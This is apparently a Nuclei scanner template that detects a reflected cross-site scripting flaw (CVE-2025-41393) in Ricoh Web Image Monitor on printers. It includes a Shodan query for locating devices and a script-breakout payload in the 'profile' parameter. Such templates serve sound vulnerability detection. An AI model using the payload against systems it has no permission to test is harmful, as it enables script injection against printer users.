id: CVE-2025-41393

info:
  name: Ricoh Web Image Monitor - Reflected XSS
  author: jpg0mez
  severity: medium
  description: |
    A reflected cross-site scripting vulnerability exists in the laser printers and MFPs (multifunction printers) which implement Ricoh Web Image Monitor. If exploited, an arbitrary script may be executed on the web browser of the user who accessed Web Image Monitor.
  reference:
    - https://www.ricoh.com/products/security/vulnerabilities/vul?id=ricoh-2025-000001
    - https://jvn.jp/en/jp/JVN20474768/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-41393
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"Web Image Monitor"
  tags: cve,cve2025,ricoh,xss,web

http:
  - method: GET
    path:
      - "{{BaseURL}}/?profile=</script><script>alert(document.domain)</script>"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>'
          - 'websys/webArch/mainFrame.cgi'
          - 'Web Image Monitor'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450221009b7f69139428a0088d64a18a5d974fec3e74e6969f160ab8fbcc2a75a55ac570022009eed8c57abb2b920dccd0c56b4e61ee7717e0069b2b69095562d0bb931835fb:922c64590222798bb761d5b6d8e72950